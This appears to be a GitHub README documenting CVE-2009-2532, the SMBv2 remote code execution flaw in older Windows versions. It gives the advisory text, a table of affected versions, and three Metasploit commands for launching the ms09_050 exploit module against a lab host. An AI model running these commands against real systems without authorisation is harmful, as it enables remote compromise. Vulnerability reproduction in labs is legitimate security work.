Skip to content

Latest commit

 

History

History
32 lines (22 loc) · 1.53 KB

README_EN.md

File metadata and controls

32 lines (22 loc) · 1.53 KB

CVE-2009-2532

Describe

Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability."

ImpactVersion

Product CPU Architecture Version Update Tested
Windows Server 2008 X64/X86 SP2
Windows Server 2008 X86/X64
Windows Vista SP1
Windows Vista SP2
Windows Vista

Utilization

use MSF Test system Windows Server 2008 SP2 x86

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run

image-20200823134421895

Analyze